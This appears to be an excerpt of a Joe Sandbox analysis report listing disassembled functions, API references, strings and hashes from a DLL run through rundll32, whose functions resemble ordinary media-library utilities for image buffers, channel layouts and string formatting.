API ID: mv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 3083893021-4180635230
Opcode ID: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
Instruction ID: 324eb216ddd130d516033ba78e4077f7499b10045cf144ab3190435d7abd8d01
Opcode Fuzzy Hash: 9c8de8448e6615b8fa7c2115a21e64c0d84a2e4daa03812f1183ed2e3bd7c657
Instruction Fuzzy Hash: 77012CB8D09B418BD304EF28908152DBAE1FFC4288FD4CA6DE4CC87355E639DA408B53

Uniqueness

Uniqueness Score: -1.00%

Function 1001B039 Relevance: 9.2, APIs: 6, Instructions: 164COMMON

Download Yara Rule

APIs

mv_pix_fmt_desc_get.F072 ref: 1001B043
mv_image_check_size.F072 ref: 1001B069

Part of subcall function 100221C0: mv_image_get_linesize.F072 ref: 10022203

mv_image_fill_linesizes.F072 ref: 1001B0C8

Part of subcall function 100215D0: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6

mv_image_fill_plane_sizes.F072 ref: 1001B15D
mv_buffer_alloc.F072 ref: 1001B1CD
mv_image_fill_pointers.F072 ref: 1001B1FC

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_buffer_allocmv_image_check_sizemv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_image_get_linesize
String ID:
API String ID: 566543421-0
Opcode ID: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
Instruction ID: 4992ce4e1065cc46e00ece35f003ee7f574db56b11f2f258b44564899a0fbe5b
Opcode Fuzzy Hash: 8bdd919ebcf96b38ab9bf70343630153b1bf13f81f3e3c8d122ca7593c126649
Instruction Fuzzy Hash: 4561E7B5A08B018FCB44DF69D59065ABBE1FF88240F16897DE949CB315E735E844CF41

Uniqueness

Uniqueness Score: -1.00%

Function 1001C210 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

mv_buffer_is_writable.F072 ref: 1001C24C
mv_buffer_is_writable.F072 ref: 1001C27C
mv_channel_layout_copy.F072 ref: 1001C30C
mv_hwframe_get_buffer.F072 ref: 1001C336
mv_frame_copy.F072 ref: 1001C348

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_is_writable$mv_channel_layout_copymv_frame_copymv_hwframe_get_buffer
String ID:
API String ID: 1431812533-0
Opcode ID: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
Instruction ID: 9aa00ebb7c7a901d7ff1af15f7d5cd17a7e62451d1a9c752bdbd2b923dfe8871
Opcode Fuzzy Hash: f51d21cc51dcd08a1813b896c01dc70d91b05fa0b1bcabd5a0f2eceed2e49e57
Instruction Fuzzy Hash: F0514A75A047169FD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E9948B91

Uniqueness

Uniqueness Score: -1.00%

Function 10001020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
_amsg_exit.MSVCRT ref: 10001086

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
Instruction ID: 2785d9bf782298c98c7f05eb770d18c25c91c74859540191a5f4291f5604d36f
Opcode Fuzzy Hash: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
Instruction Fuzzy Hash: D031DE70609291CBF341DF69C9C838A77E0EB843D4F11842DED888B65CD7B9D980CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000E173 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1000DF70
mv_channel_layout_from_mask.F072 ref: 1000E046
mv_freep.F072 ref: 1000E17B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_channel_layout_from_maskmv_freepstrcmp
String ID:
API String ID: 3576703362-0
Opcode ID: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
Instruction ID: f14a3d27c2c21489c07e4dbc689c5fec37a1484687acd34e25a8149a501b133e
Opcode Fuzzy Hash: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
Instruction Fuzzy Hash: 45312535A083819FE340EF25D48062FBBE1EF84394F52992EF98997314D671EC40CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10022061 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

mv_image_get_linesize.F072 ref: 100220C7

Part of subcall function 10021480: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496

mv_log.F072 ref: 10022171
mv_log.F072(?), ref: 100221AE

Strings

Picture size %ux%u is invalid, xrefs: 10022154
Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1002219E

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
API String ID: 1737039923-91635712
Opcode ID: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
Instruction ID: d1011bfbbf7dbf5d13950a67888087e963138b3faade39ec3db9adc7e097331a
Opcode Fuzzy Hash: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
Instruction Fuzzy Hash: 9441D0B5A083549FC340CF69C48060AFBE1FBD8750F958A2EF9A8D3350E774E9458B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000C560 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 1000C582
strcmp.MSVCRT ref: 1000C5B0
strtol.MSVCRT ref: 1000C5DA

Strings

AMBI, xrefs: 1000C561

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmpstrncmpstrtol
String ID: AMBI
API String ID: 155133989-3084986980
Opcode ID: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
Instruction ID: 080b42f47ecb1617c9eeb941eeb6b1a796e462e2a98a72bb2a37a4396a6a9be9
Opcode Fuzzy Hash: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
Instruction Fuzzy Hash: 6A21BEB5A0C7858FF350CF2898C064FBAD0EB492D1F11893EF989C7355E235E8858B82

Uniqueness

Uniqueness Score: -1.00%

Function 10012370 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strftime.MSVCRT ref: 100123EF
mv_strlcatf.F072 ref: 10012429
mv_dict_set.F072 ref: 1001244D

Strings

.%06dZ, xrefs: 10012419
%Y-%m-%dT%H:%M:%S, xrefs: 100123D6

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrftime
String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
API String ID: 3046200060-930656424
Opcode ID: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
Instruction ID: 4200585820eefb0ad3589c066a71afa0f6c055d7c0249a28ce441d2d822c6705
Opcode Fuzzy Hash: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
Instruction Fuzzy Hash: 3F21B0B5A093419FD350DF29E58069BBBE0FB88354F51C92EF89CC7301E638D8849B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D5CB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

mv_bprintf.F072 ref: 1000D617
mv_bprintf.F072 ref: 1000D64E
mv_bprintf.F072 ref: 1000D678
mv_bprintf.F072 ref: 1000D715
mv_bprintf.F072 ref: 1000D7EB
mv_bprintf.F072 ref: 1000D814
mv_bprintf.F072 ref: 1000D84A
mv_bprintf.F072 ref: 1000D86F
mv_bprintf.F072 ref: 1000D8CE

Strings

NONE, xrefs: 1000D60B
@%s, xrefs: 1000D642

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s$NONE
API String ID: 3083893021-9228147
Opcode ID: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
Instruction ID: 7566f4ee250c6b1008f1cbc21f7ab5f057a1ffbd92fde749fdda637f05722331
Opcode Fuzzy Hash: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
Instruction Fuzzy Hash: 8C114C75909B1A8BE720EF18C58006EF7E1FB443D4F55891EE889A7219D731EC94CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 100194D1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 100194D8
mv_strerror.F072 ref: 100194FE

Part of subcall function 10013B30: mv_strlcpy.F072 ref: 10013B71

mv_log.F072 ref: 1001951B
_close.MSVCRT ref: 10019523

Strings

Error occurred in fstat(): %s, xrefs: 1001950B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _close_errnomv_logmv_strerrormv_strlcpy
String ID: Error occurred in fstat(): %s
API String ID: 1199337903-68092211
Opcode ID: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
Instruction ID: dfd730866d5ba72d1ec682aa82f713c85e766a8eb03f77e440fb808261e44811
Opcode Fuzzy Hash: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
Instruction Fuzzy Hash: A3F092B4819755DFC310DF14C48425EFBE4FF84700F51881EE5D997321DB78A9459B86

Uniqueness

Uniqueness Score: -1.00%

Function 10007100 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 114stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10007126
strchr.MSVCRT ref: 1000715B
strncmp.MSVCRT ref: 10007200
strlen.MSVCRT ref: 1000724B

Strings

-, xrefs: 10007232

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$strchrstrncmp
String ID: -
API String ID: 2264528763-2547889144
Opcode ID: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
Instruction ID: 5f1f2dd0eab5bc6f8befd7c2bb33942bdc2d6399c7dfe7216c1ccb09edde324b
Opcode Fuzzy Hash: f0f04a066c244188fbca6ac71b0a1930aa93ce774d345eeea5f276fcbf092cf4
Instruction Fuzzy Hash: 6F318075A0C3558FEB50DA78949026EBBE1FF893C4F05492DF9C8D7245D278D9068B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A480 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 1000A4BA
mv_freep.F072 ref: 1000A4E8
mv_freep.F072 ref: 1000A541

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_mallocz
String ID:
API String ID: 2455733640-0
Opcode ID: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
Instruction ID: 3b99154a913b274524c08becb6f728f5f8244ec0eeb4226c169e02ad570783d9
Opcode Fuzzy Hash: 57be5cbf1da16da54839bca519b4bd6de1be08dc8cda019c43820ae6256fb6b0
Instruction Fuzzy Hash: 1131B074908B01CFD760DF25C581A1AB7F0FF89391B568A5DEC999B319D730E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10012049 Relevance: 7.6, APIs: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1001205B
strlen.MSVCRT ref: 10012069
mv_realloc.F072 ref: 1001207F

Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB

mv_freep.F072 ref: 100120D0

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
Instruction ID: 9bf475a18fd4cb1c0505352b53a299a598f586f68b75c8a149e966f8cd1839f1
Opcode Fuzzy Hash: 76a04085e64d47384e2e2ce00772daf36afdae989b4b3b42e904556264258d40
Instruction Fuzzy Hash: 0031CDB99087058FC744CF29C18045AFBE1FF88718F558A6EE889AB310D731EA45CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A650 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1000A66C
mv_freep.F072 ref: 1000A69C
ReleaseSRWLockExclusive.KERNEL32 ref: 1000A6AB

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireReleasemv_freep
String ID:
API String ID: 2444013405-0
Opcode ID: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
Instruction ID: c3c698d3df7831113588d9bdc2aa75e8a835319d0c3e7d0db2d9c6c4417e318c
Opcode Fuzzy Hash: d869766378f18830eaedbb65d13c15c11a69b80f9d160b7f9c0174b365de840b
Instruction Fuzzy Hash: 7B21D6B5608701CFD700EF25D5C491ABBF4EF85280F06C969E8898B31AD731E885CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10012239 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

mv_bprint_init.F072 ref: 1001225D
mv_bprint_escape.F072 ref: 100122B3
mv_bprint_append_data.F072 ref: 100122CC
mv_bprint_escape.F072 ref: 100122EE
mv_bprint_finalize.F072 ref: 1001231B
mv_bprint_append_data.F072 ref: 1001234B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
String ID:
API String ID: 3283265872-0
Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10011483 Relevance: 7.6, APIs: 5, Instructions: 61stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 10011491
strlen.MSVCRT ref: 1001149F
mv_realloc.F072 ref: 100114B5

Part of subcall function 10028DA0: _aligned_realloc.MSVCRT ref: 10028DCB

mv_freep.F072 ref: 100114E2

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

